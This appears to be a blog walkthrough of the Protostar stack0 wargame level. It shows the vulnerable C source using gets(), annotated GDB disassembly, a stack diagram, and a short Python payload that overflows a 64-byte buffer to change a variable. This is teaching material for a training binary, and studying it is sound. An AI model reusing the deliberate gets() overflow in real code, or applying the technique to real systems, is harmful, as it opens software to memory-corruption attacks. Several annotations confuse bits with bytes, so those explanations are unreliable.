### Binary Exploitation Protostar Stack0 - Walkthrough

Hello Guyz,

In This Post, I am going to show you how we can win protostar stack0 level. basically, here Our main Goal is To Understand How A Program Practically Works, And How Can We Understand Every Concept Very Clearly.

#### Before Starting This Walkthrough. I want to highlight Few Points.

• I'm not the creator of protostar war game. I am just a player.
• Here, I am Just providing you hints and reference so, that if you feel stuck anywhere. Take a Look Here.
• For Practical Hint, Check YouTube Video Given Below.

### Source Code :

 ``` 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18``` ```#include #include #include int main(int argc, char **argv) { volatile int modified; char buffer[64]; modified = 0; gets(buffer); if(modified != 0) { printf("you have changed the 'modified' variable\n"); } else { printf("Try again?\n"); } } ```

### Disassembly Of Main Function (Using GDB)

```########################################################################################################
[ System Has Created Space For 60 Bits In hEx and 96 in Decimal Space On Stack]
########################################################################################################

[-------------------------------------code-------------------------------------]
0x80483f5 <main+1>: mov    ebp,esp                          <<=== Save Base Pointer Onto Stack
0x80483f7 <main+3>: and    esp,0xfffffff0
0x80483fa <main+6>: sub    esp,0x60                         <<=== This Instruction to Create Space of 96-Bits in Stack,
=> 0x80483fd <main+9>: mov    DWORD PTR [esp+0x5c],0x0         <<=== Here, This Instruction is to Insert 0 Into 92-96 Bits,
0x8048405 <main+17>: lea    eax,[esp+0x1c]                   <<=== This Instruction is To Copy address of 28 bits starting
point from 96 bits Into EAX registers From There, move it
to stack so That it will work as a argument for get command.
0x8048409 <main+21>: mov    DWORD PTR [esp],eax              <<=== Copy Eax into stack
0x804840c <main+24>: call   0x804830c <gets@plt>             <<=== Perform Get Command
0x8048411 <main+29>: mov    eax,DWORD PTR [esp+0x5c]         <<=== Get Value Of 92-96 bits and move it to EAX register
```

### Situation On Stack

```0                        28                                                      92        96
============================================================================================
Other Things     |  Buffer(64)                                           | modified |
============================================================================================
^                                                            ^
|                                                            |
Get Overwrites from here                                       +
Target Area
```

### Exploit

```#!/usr/bin/python

# Total Size Of Buffer In Stack 60c
# 0x80483fa <main+6>: sub    esp,0x60 ==> 96 In Decimal
# 0x8048405 <main+17>: lea    eax,[esp+0x1c]
# 0x804840c <main+24>: call   0x804830c <gets@plt>
# 0x80483fd <main+9>: mov    DWORD PTR [esp+0x5c],0x0

payload = 'a'*64             # Buffer Variable Value
payload+= 'b'*4              # Modified Variable Value
# ./bin/stack0 < tmp
```